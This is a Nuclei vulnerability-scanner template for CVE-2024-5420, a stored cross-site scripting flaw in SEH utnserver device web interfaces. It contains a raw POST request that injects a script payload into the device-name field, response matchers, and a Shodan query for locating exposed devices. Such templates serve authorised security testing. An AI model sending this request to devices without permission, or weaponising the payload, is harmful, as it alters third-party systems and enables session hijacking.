daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2024/CVE-2024-5420.yaml

54 lines
2.1 KiB
YAML
Raw Blame History

id: CVE-2024-5420
info:
name: SEH utnserver Pro/ProMAX/INU-100 20.1.22 - Cross-Site Scripting
author: bl4ckp4r4d1s3
severity: high
description: |
A vulnerability was found in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, affecting the device description parameter in the web interface. This flaw allows stored cross-site scripting (XSS), enabling attackers to inject JavaScript code. The attack can be executed remotely by tricking victims into visiting a malicious website, potentially leading to session hijacking. This vulnerability is publicly disclosed and identified as CVE-2024-5420.
reference:
- https://cyberdanube.com/en/en-multiple-vulnerabilities-in-seh-untserver-pro/index.html
- https://seclists.org/fulldisclosure/2024/Jun/4
- https://nvd.nist.gov/vuln/detail/CVE-2024-5420
- http://seclists.org/fulldisclosure/2024/Jun/4
- https://cyberdanube.com/en/en-multiple-vulnerabilities-in-oring-iap420/index.html
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:L
cvss-score: 8.3
cve-id: CVE-2024-5420
cwe-id: CWE-79
epss-score: 0.00043
epss-percentile: 0.09509
metadata:
verified: true
max-request: 1
shodan-query: html:"utnserver Control Center"
tags: cve,cve2024,utnserver,seh,xss,seclists
http:
- raw:
- |
POST /device/description_en.html HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=set&sys_name=%E2%80%9C%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sys_descr=&sys_contact=
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'value="“><script>alert(document.domain)</script>" id="standort"'
- 'Host name</label>'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022051388b85a170055ec23c30fbc457211223d879dadea52c135baf99776d83ef77022100ce6177ab9a960dc01d6c4f3d40de0e3e6256c7a1af09d484921f19c5a4285bb6:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink